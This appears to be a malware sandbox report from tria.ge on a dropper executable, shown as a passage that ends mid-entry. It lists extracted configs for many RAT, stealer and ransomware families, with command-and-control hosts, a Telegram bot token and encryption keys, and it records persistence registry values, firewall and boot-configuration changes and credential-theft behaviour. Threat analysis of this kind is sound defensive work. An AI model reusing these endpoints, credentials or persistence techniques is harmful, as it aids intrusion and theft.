Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Resubmissions
17/01/2025, 15:11
250117-sk4kzssrhv 1017/01/2025, 15:09
250117-sjgd3asrbs 1017/01/2025, 15:07
250117-shlbmasqgv 1017/01/2025, 14:27
250117-rsndas1pgx 1016/01/2025, 17:37
250116-v7e71s1ncy 1016/01/2025, 17:30
250116-v27eba1lew 1016/01/2025, 17:29
250116-v232ws1let 316/01/2025, 17:29
250116-v21lrs1ldz 316/01/2025, 17:27
250116-v1g32a1qfk 1016/01/2025, 09:47
250116-lsajjsvrgn 10Analysis
-
max time kernel
227s -
max time network
1392s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
14/01/2025, 11:59
Static task
static1
Behavioral task
behavioral1
Sample
4363463463464363463463463.exe
Resource
win7-20240729-en
General
-
Target
4363463463464363463463463.exe
-
Size
10KB
-
MD5
2a94f3960c58c6e70826495f76d00b85
-
SHA1
e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
-
SHA256
2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
-
SHA512
fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
-
SSDEEP
192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K
Malware Config
Extracted
xworm
127.0.0.1:6000
103.211.201.109:6000
147.185.221.22:47930
127.0.0.1:47930
-
Install_directory
%AppData%
-
install_file
XClient.exe
-
telegram
https://api.telegram.org/bot7929370892:AAGwrX5TeyxQidZdAEm_Z6-CDvPUOQzVY1M
Extracted
xworm
3.1
camp.zapto.org:7771
-
Install_directory
%AppData%
-
install_file
USB.exe
Extracted
metasploit
windows/reverse_http
http://89.197.154.116:7810/yTHhXb9uKTVtHGwdC-KhsgWbOZaN3HxidwX14UcC9cvoELjOGQD
Extracted
remcos
5.3.0 Light
Prueba
192.168.10.1:2404
-
audio_folder
MicRecords
-
audio_path
ApplicationPath
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
registros.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-7OXI1T
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Capturas de pantalla
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Extracted
quasar
1.4.1
Test
147.185.221.22:54755
9cabbafb-503b-49f1-ab22-adc756455c10
-
encryption_key
8B93C77AC1C58EA80A3327E9FD26246A79EF3B8E
-
install_name
Onedrive.exe
-
log_directory
Logs
-
reconnect_delay
100
-
startup_key
Microsoft OneDrive
-
subdirectory
Onedrive
Extracted
asyncrat
Shadow X RAT & HVNC 1.0.0
reWASD
sayo0w.duckdns.org:7173
2318923179jj27139792813j721983j7213987j98213j97823j789213j978213j978j12391239j913278321
-
delay
1
-
install
true
-
install_file
svchost.exe
-
install_folder
C:\WIndows
Extracted
quasar
1.4.1
dilly
lvke-45989.portmap.host:45989
0cb49dc2-fd0d-4581-ae1e-04154c41f310
-
encryption_key
E5250226804167CB0B1B4B0E9667D0C056694DCA
-
install_name
defenderx64.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Windows Defender Helper
-
subdirectory
en
Extracted
asyncrat
1.0.7
Default
217.195.195.46:1604
DcRatMutex_qwqdanchun
-
delay
1
-
install
false
-
install_folder
%AppData%
Extracted
lumma
https://sordid-snaked.cyou/api
https://awake-weaves.cyou/api
https://wrathful-jammy.cyou/api
https://debonairnukk.xyz/api
https://diffuculttan.xyz/api
https://effecterectz.xyz/api
https://deafeninggeh.biz/api
https://immureprech.biz/api
https://preside-comforter.sbs/api
https://savvy-steereo.sbs/api
https://copper-replace.sbs/api
https://record-envyp.sbs/api
https://slam-whipp.sbs/api
https://wrench-creter.sbs/api
https://looky-marked.sbs/api
https://plastic-mitten.sbs/api
https://voter-screnn.cyou/api
https://powerful-avoids.sbs/api
https://motion-treesz.sbs/api
https://disobey-curly.sbs/api
https://leg-sate-boat.sbs/api
https://story-tense-faz.sbs/api
https://blade-govern.sbs/api
https://occupy-blushi.sbs/api
https://frogs-severz.sbs/api
https://a1m0sph3reds.cyou/api
Extracted
quasar
1.4.1
Office04
Extazz24535-22930.portmap.host:22930
4.tcp.us-cal-1.ngrok.io:18092
98.51.190.130:20
73.62.14.5:4782
interestingsigma.hopto.org:20
89f58ee5-7af9-42de-843f-2a331a641e3f
-
encryption_key
CD4F349DEB46AEE10C2FE886E5B2BD7A766723CE
-
install_name
2klz.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Quasar Client Startup
-
subdirectory
SubDir
Extracted
quasar
1.4.0.0
Office
85.192.29.60:5173
45.136.51.217:5173
QAPB6w0UbYXMvQdKRF
-
encryption_key
pxC3g4rfVijQxK1hMGwM
-
install_name
csrss.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
NET framework
-
subdirectory
SubDir
Extracted
quasar
1.4.1
main-pc
192.168.100.2:4444
979e9520-ec25-48f6-8cd4-516d1007358f
-
encryption_key
6B74F0C858B7E90573D4E97997F2A082B9781250
-
install_name
main-pc.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Microsoft Service
-
subdirectory
SubDir
Extracted
quasar
1.4.1
rat1
147.185.221.24:15249
unitedrat.ddns.net:4782
da67ff1b-f911-4ad4-a51c-c7c5bd13aeb3
-
encryption_key
AB7A97D9E0F9B0A44190A0D500EAB7AF37629802
-
install_name
System32.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
System32
-
subdirectory
System32
Extracted
xworm
3.0
notes-congress.gl.at.ply.gg:24370
xfgLgucyz0P7wfhC
-
install_file
USB.exe
Extracted
asyncrat
0.5.8
Default
127.0.0.1:6606
127.0.0.1:7707
127.0.0.1:8808
127.0.0.1:1337
127.0.0.1:16335
127.0.0.1:11195
18.119.130.176:6606
18.119.130.176:7707
18.119.130.176:8808
18.119.130.176:1337
18.119.130.176:16335
18.119.130.176:11195
2.tcp.ngrok.io:6606
2.tcp.ngrok.io:7707
2.tcp.ngrok.io:8808
2.tcp.ngrok.io:1337
2.tcp.ngrok.io:16335
2.tcp.ngrok.io:11195
8.tcp.ngrok.io:6606
8.tcp.ngrok.io:7707
8.tcp.ngrok.io:8808
8.tcp.ngrok.io:1337
8.tcp.ngrok.io:16335
8.tcp.ngrok.io:11195
Yp91dpbmYOAB
-
delay
3
-
install
true
-
install_file
RtlUpdate.exe
-
install_folder
%AppData%
Extracted
redline
testx
193.203.238.86:1912
Extracted
cobaltstrike
http://152.67.212.187:443/accelerate/irc/Z0LCY5JYZL5
-
user_agent
Accept: application/xml, image/*, application/json Accept-Language: nl-be Accept-Encoding: gzip, * User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0
Signatures
-
Asyncrat family
-
Avoslocker Ransomware
Avoslocker is a relatively new ransomware, that was observed in late June and early July, 2021.
-
Avoslocker family
-
Cobaltstrike
Detected malicious payload which is part of Cobaltstrike.
-
Cobaltstrike family
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Dcrat family
-
Detect Xworm Payload 12 IoCs
resource yara_rule behavioral1/files/0x000d000000018bf3-159.dat family_xworm behavioral1/memory/2428-161-0x0000000000B30000-0x0000000000B4A000-memory.dmp family_xworm behavioral1/memory/1232-253-0x00000000010F0000-0x000000000110A000-memory.dmp family_xworm behavioral1/files/0x000e000000019cba-557.dat family_xworm behavioral1/memory/1228-561-0x0000000001120000-0x0000000001138000-memory.dmp family_xworm behavioral1/memory/2796-1264-0x0000000000CC0000-0x0000000000CD8000-memory.dmp family_xworm behavioral1/memory/3220-1583-0x0000000000E70000-0x0000000000E88000-memory.dmp family_xworm behavioral1/files/0x000700000001c8ce-1601.dat family_xworm behavioral1/memory/1432-1639-0x0000000000800000-0x000000000085A000-memory.dmp family_xworm behavioral1/memory/2632-1696-0x0000000000220000-0x0000000000238000-memory.dmp family_xworm behavioral1/files/0x000c00000001c8df-2233.dat family_xworm behavioral1/files/0x0003000000021338-27747.dat family_xworm -
Lumma family
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Metasploit family
-
Modifies WinLogon for persistence 2 TTPs 5 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Componentperf\\Onedrive.exe\"" componentdll.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Componentperf\\Onedrive.exe\", \"C:\\Recovery\\3a99bb82-4e15-11ef-8354-cae67966b5f6\\WmiPrvSE.exe\"" componentdll.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Componentperf\\Onedrive.exe\", \"C:\\Recovery\\3a99bb82-4e15-11ef-8354-cae67966b5f6\\WmiPrvSE.exe\", \"C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\fr\\nobody.exe\"" componentdll.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Componentperf\\Onedrive.exe\", \"C:\\Recovery\\3a99bb82-4e15-11ef-8354-cae67966b5f6\\WmiPrvSE.exe\", \"C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\fr\\nobody.exe\", \"C:\\Componentperf\\notepad.exe\"" componentdll.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Componentperf\\Onedrive.exe\", \"C:\\Recovery\\3a99bb82-4e15-11ef-8354-cae67966b5f6\\WmiPrvSE.exe\", \"C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\fr\\nobody.exe\", \"C:\\Componentperf\\notepad.exe\", \"C:\\Windows\\es-ES\\conhost.exe\"" componentdll.exe -
Process spawned unexpected child process 18 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4192 940 schtasks.exe 33 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4388 940 schtasks.exe 33 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4776 940 schtasks.exe 33 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2996 940 schtasks.exe 33 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4200 940 schtasks.exe 33 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4852 940 schtasks.exe 33 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4864 940 schtasks.exe 33 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4900 940 schtasks.exe 33 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4152 940 schtasks.exe 33 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4812 940 schtasks.exe 33 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3436 940 schtasks.exe 33 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4404 940 schtasks.exe 33 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4568 940 schtasks.exe 33 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3668 940 schtasks.exe 33 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4236 940 schtasks.exe 33 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5896 940 schtasks.exe 33 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6872 940 schtasks.exe 33 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5964 940 schtasks.exe 33 -
description flow ioc Process 1540 ip-api.com Process not Found 16 ip-api.com Process not Found 247 ip-api.com Process not Found 378 ip-api.com Process not Found 779 api.ipify.org Process not Found 807 ip-api.com Process not Found 1254 ip-api.com Process not Found 1437 ip-api.com Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4363463463464363463463463.exe 137 ip-api.com Process not Found 778 api.ipify.org Process not Found -
Quasar family
-
Quasar payload 44 IoCs
resource yara_rule behavioral1/files/0x000c000000019dbf-825.dat family_quasar behavioral1/memory/784-829-0x0000000000220000-0x000000000055C000-memory.dmp family_quasar behavioral1/memory/1328-871-0x0000000000C90000-0x0000000000FCC000-memory.dmp family_quasar behavioral1/memory/2124-968-0x0000000001180000-0x00000000014A4000-memory.dmp family_quasar behavioral1/files/0x000a00000001a4d3-971.dat family_quasar behavioral1/memory/2236-972-0x0000000000F30000-0x0000000001254000-memory.dmp family_quasar behavioral1/memory/2688-1153-0x00000000000E0000-0x0000000000404000-memory.dmp family_quasar behavioral1/files/0x000500000001a4eb-1155.dat family_quasar behavioral1/memory/3032-1157-0x0000000000B50000-0x0000000000E74000-memory.dmp family_quasar behavioral1/memory/2448-1169-0x00000000010A0000-0x00000000013C4000-memory.dmp family_quasar behavioral1/files/0x000500000001a4f1-1173.dat family_quasar behavioral1/memory/2840-1177-0x0000000000190000-0x00000000004B4000-memory.dmp family_quasar behavioral1/memory/1648-1253-0x0000000000100000-0x000000000014E000-memory.dmp family_quasar behavioral1/memory/3348-1324-0x00000000000F0000-0x0000000000414000-memory.dmp family_quasar behavioral1/files/0x000500000001c794-1346.dat family_quasar behavioral1/memory/3612-1350-0x0000000001170000-0x00000000011BE000-memory.dmp family_quasar behavioral1/memory/3980-1368-0x0000000001170000-0x0000000001494000-memory.dmp family_quasar behavioral1/files/0x000500000001c881-1370.dat family_quasar behavioral1/memory/4068-1378-0x0000000000FC0000-0x00000000012E4000-memory.dmp family_quasar behavioral1/memory/3336-1394-0x0000000000FF0000-0x0000000001314000-memory.dmp family_quasar behavioral1/memory/3608-1409-0x0000000001280000-0x00000000015A4000-memory.dmp family_quasar behavioral1/memory/3180-1475-0x0000000000D20000-0x0000000001044000-memory.dmp family_quasar behavioral1/files/0x000500000001c8b1-1482.dat family_quasar behavioral1/memory/3332-1483-0x0000000001140000-0x0000000001464000-memory.dmp family_quasar behavioral1/memory/3448-1487-0x0000000000A50000-0x0000000000D74000-memory.dmp family_quasar behavioral1/memory/3452-1492-0x0000000000B00000-0x0000000000E24000-memory.dmp family_quasar behavioral1/files/0x000500000001c8ba-1497.dat family_quasar behavioral1/memory/328-1499-0x0000000000040000-0x0000000000364000-memory.dmp family_quasar behavioral1/memory/3196-1521-0x0000000001330000-0x0000000001654000-memory.dmp family_quasar behavioral1/memory/3676-1533-0x0000000000900000-0x0000000000C24000-memory.dmp family_quasar behavioral1/files/0x000500000001c8b1-1535.dat family_quasar behavioral1/memory/2760-1536-0x0000000000B30000-0x0000000000E54000-memory.dmp family_quasar behavioral1/memory/2148-1546-0x0000000000370000-0x0000000000694000-memory.dmp family_quasar behavioral1/memory/2464-1584-0x0000000000970000-0x0000000000C94000-memory.dmp family_quasar behavioral1/memory/1960-1636-0x0000000001010000-0x0000000001334000-memory.dmp family_quasar behavioral1/memory/3284-1638-0x00000000003C0000-0x000000000040E000-memory.dmp family_quasar behavioral1/memory/1716-1659-0x00000000011C0000-0x00000000014E4000-memory.dmp family_quasar behavioral1/memory/3544-1735-0x0000000001340000-0x0000000001664000-memory.dmp family_quasar behavioral1/memory/1692-1840-0x00000000002D0000-0x00000000005F4000-memory.dmp family_quasar behavioral1/memory/1408-1844-0x0000000000E10000-0x0000000001134000-memory.dmp family_quasar behavioral1/files/0x000800000001c965-2258.dat family_quasar behavioral1/files/0x000600000001cc86-2632.dat family_quasar behavioral1/files/0x0003000000021240-27485.dat family_quasar behavioral1/files/0x0003000000021551-28121.dat family_quasar -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 2 IoCs
resource yara_rule behavioral1/memory/2032-1833-0x0000000000A40000-0x0000000000A92000-memory.dmp family_redline behavioral1/files/0x000400000001fd7d-27509.dat family_redline -
Redline family
-
Remcos family
-
Xworm family
-
Async RAT payload 4 IoCs
resource yara_rule behavioral1/files/0x000500000001a4c3-894.dat family_asyncrat behavioral1/files/0x000400000001caab-1827.dat family_asyncrat behavioral1/files/0x000700000001c8d9-2047.dat family_asyncrat behavioral1/files/0x000500000002124b-28145.dat family_asyncrat -
DCRat payload 2 IoCs
resource yara_rule behavioral1/files/0x000400000001cb51-1838.dat family_dcrat_v2 behavioral1/memory/3696-1839-0x0000000000950000-0x0000000000A34000-memory.dmp family_dcrat_v2 -
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 5636 bcdedit.exe 6880 bcdedit.exe 15224 bcdedit.exe 15308 bcdedit.exe -
Renames multiple (7095) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 15080 powershell.exe 1040 powershell.exe 6576 powershell.exe 6892 powershell.exe 3180 powershell.exe 3016 powershell.exe 1604 powershell.exe 2068 powershell.exe 10792 powershell.exe 4468 powershell.exe 4828 powershell.exe 6540 powershell.exe 5956 powershell.exe 1612 powershell.exe 3736 powershell.exe 4136 powershell.exe 8152 powershell.exe 4224 powershell.exe 13732 powershell.exe 2636 powershell.exe 10568 powershell.exe 11336 powershell.exe 1460 powershell.exe 10596 powershell.exe 9456 powershell.exe 10384 powershell.exe 2220 powershell.exe 2356 powershell.exe 5008 powershell.exe 10600 powershell.exe 7620 powershell.exe 12760 powershell.exe 6532 powershell.exe 6340 powershell.exe 9424 powershell.exe 14572 powershell.exe -
Disables Task Manager via registry modification
-
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 37 IoCs
pid Process 4268 netsh.exe 6952 netsh.exe 10184 netsh.exe 7796 netsh.exe 6156 netsh.exe 2828 netsh.exe 4636 netsh.exe 4716 netsh.exe 4744 netsh.exe 1764 netsh.exe 15240 netsh.exe 4900 netsh.exe 4896 netsh.exe 4356 netsh.exe 4488 netsh.exe 8420 netsh.exe 3992 netsh.exe 276 netsh.exe 812 netsh.exe 4592 netsh.exe 4316 netsh.exe 3192 netsh.exe 4060 netsh.exe 9196 netsh.exe 1784 netsh.exe 2300 netsh.exe 4708 netsh.exe 10120 netsh.exe 2720 netsh.exe 4048 netsh.exe 4608 netsh.exe 7480 netsh.exe 920 netsh.exe 2980 netsh.exe 4092 netsh.exe 9380 netsh.exe 1148 netsh.exe -
.NET Reactor proctector 2 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
resource yara_rule behavioral1/files/0x0014000000019230-326.dat net_reactor behavioral1/memory/2632-331-0x00000000009D0000-0x0000000000A1E000-memory.dmp net_reactor -
Drops startup file 27 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk XClient.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dllhost.exe dllhost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\boleto.lnk boleto.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dllhost.exe dllhost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\13123c66ee9d74c7936482e0e7d9809fWindows Update.exe server.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.exe server.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk XClient.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.exe server.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\13123c66ee9d74c7936482e0e7d9809fWindows Update.exe server.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\13123c66ee9d74c7936482e0e7d9809fWindows Update.exe server.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.exe server.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.exe server.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\requirements.lnk requirements.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\13123c66ee9d74c7936482e0e7d9809fWindows Update.exe server.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\13123c66ee9d74c7936482e0e7d9809fWindows Update.exe server.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\13123c66ee9d74c7936482e0e7d9809fWindows Update.exe server.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.exe server.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.exe server.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\13123c66ee9d74c7936482e0e7d9809fWindows Update.exe server.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.exe server.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\boleto.lnk boleto.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dllhost.url dllhost.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.exe server.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\13123c66ee9d74c7936482e0e7d9809fWindows Update.exe server.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\requirements.lnk requirements.exe -
Executes dropped EXE 64 IoCs
pid Process 2428 XClient.exe 1232 XClient.exe 2632 OLDxTEAM.exe 1228 boleto.exe 2300 Excel-https.exe 2156 prueba.exe 784 OneDrive.exe 2164 FreeYoutubeDownloader.exe 2852 Free YouTube Downloader.exe 1328 Onedrive.exe 440 Enigma32g.exe 2884 svchost.exe 2664 Client.exe 2676 njSilent.exe 1356 svchost.exe 2124 defender64.exe 2236 defenderx64.exe 2844 w.exe 1404 CFXBypass.exe 2092 CFXBypass.exe 2688 2klz.exe 3032 2klz.exe 2448 lmao.exe 2840 Client.exe 2808 defenderx64.exe 1648 kthiokadjg.exe 2344 XClient.exe 2796 boleto.exe 3348 2klz.exe 3516 svchost.exe 3572 update.exe 3612 ytjgjdrthjdw.exe 3684 defenderx64.exe 3900 main.exe 3980 discord.exe 4068 main-pc.exe 3336 2klz.exe 3468 dllhost.exe 3608 defenderx64.exe 3180 Client-built-Playit.exe 3260 self-injection.exe 3332 System32.exe 3448 jignesh.exe 3452 Sentil.exe 328 Client1.exe 3864 evetbeta.exe 3728 2klz.exe 4000 Host.exe 3196 defenderx64.exe 3676 Client-built.exe 2760 System32.exe 2148 2klz.exe 3908 defenderx64.exe 3596 donut.exe 816 System32.exe 3220 svchost.exe 2464 2klz.exe 1820 Lumm.exe 3860 defenderx64.exe 3108 testme.exe 2796 svchost.exe 1960 System32.exe 3284 nbothjkd.exe 1432 XClient.exe -
Loads dropped DLL 64 IoCs
pid Process 2268 4363463463464363463463463.exe 2268 4363463463464363463463463.exe 2368 WerFault.exe 2368 WerFault.exe 2368 WerFault.exe 2368 WerFault.exe 2368 WerFault.exe 2916 4363463463464363463463463.exe 2916 4363463463464363463463463.exe 2916 4363463463464363463463463.exe 1556 4363463463464363463463463.exe 1556 4363463463464363463463463.exe 2988 4363463463464363463463463.exe 2988 4363463463464363463463463.exe 2164 FreeYoutubeDownloader.exe 2164 FreeYoutubeDownloader.exe 2332 4363463463464363463463463.exe 2332 4363463463464363463463463.exe 2332 4363463463464363463463463.exe 2268 4363463463464363463463463.exe 1532 4363463463464363463463463.exe 1964 4363463463464363463463463.exe 2916 4363463463464363463463463.exe 2916 4363463463464363463463463.exe 1404 CFXBypass.exe 1604 4363463463464363463463463.exe 1604 4363463463464363463463463.exe 2988 4363463463464363463463463.exe 2060 4363463463464363463463463.exe 1556 4363463463464363463463463.exe 1556 4363463463464363463463463.exe 2916 4363463463464363463463463.exe 2916 4363463463464363463463463.exe 3900 main.exe 2988 4363463463464363463463463.exe 2988 4363463463464363463463463.exe 2988 4363463463464363463463463.exe 624 4363463463464363463463463.exe 624 4363463463464363463463463.exe 624 4363463463464363463463463.exe 2268 4363463463464363463463463.exe 2268 4363463463464363463463463.exe 2268 4363463463464363463463463.exe 2988 4363463463464363463463463.exe 2988 4363463463464363463463463.exe 2988 4363463463464363463463463.exe 2988 4363463463464363463463463.exe 2988 4363463463464363463463463.exe 1532 4363463463464363463463463.exe 1532 4363463463464363463463463.exe 1532 4363463463464363463463463.exe 1532 4363463463464363463463463.exe 2916 4363463463464363463463463.exe 1964 4363463463464363463463463.exe 1964 4363463463464363463463463.exe 2060 4363463463464363463463463.exe 1556 4363463463464363463463463.exe 1556 4363463463464363463463463.exe 2268 4363463463464363463463463.exe 2268 4363463463464363463463463.exe 2916 4363463463464363463463463.exe 2916 4363463463464363463463463.exe 2916 4363463463464363463463463.exe 2916 4363463463464363463463463.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral1/memory/3516-1340-0x000000013F1C0000-0x000000013F3F7000-memory.dmp vmprotect behavioral1/memory/3516-1338-0x000000013F1C0000-0x000000013F3F7000-memory.dmp vmprotect behavioral1/memory/3516-1337-0x000000013F1C0000-0x000000013F3F7000-memory.dmp vmprotect behavioral1/memory/2060-1336-0x0000000006420000-0x0000000006657000-memory.dmp vmprotect behavioral1/files/0x000700000001c8cc-1623.dat vmprotect behavioral1/memory/2796-1627-0x000000013FD20000-0x000000013FF57000-memory.dmp vmprotect behavioral1/memory/2796-1626-0x000000013FD20000-0x000000013FF57000-memory.dmp vmprotect behavioral1/memory/2796-1629-0x000000013FD20000-0x000000013FF57000-memory.dmp vmprotect -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 17 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\notepad = "\"C:\\Componentperf\\notepad.exe\"" componentdll.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\notepad = "\"C:\\Componentperf\\notepad.exe\"" componentdll.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Windows\\es-ES\\conhost.exe\"" componentdll.exe Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\Free Youtube Downloader = "C:\\Windows\\Free Youtube Downloader\\Free Youtube Downloader\\Free YouTube Downloader.exe" FreeYoutubeDownloader.exe Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Roaming\\svchost.exe" svchost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\Recovery\\3a99bb82-4e15-11ef-8354-cae67966b5f6\\WmiPrvSE.exe\"" componentdll.exe Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\Recovery\\3a99bb82-4e15-11ef-8354-cae67966b5f6\\WmiPrvSE.exe\"" componentdll.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\nobody = "\"C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\fr\\nobody.exe\"" componentdll.exe Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Windows\\es-ES\\conhost.exe\"" componentdll.exe Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\boleto = "C:\\Users\\Admin\\AppData\\Roaming\\boleto.exe" boleto.exe Set value (str) 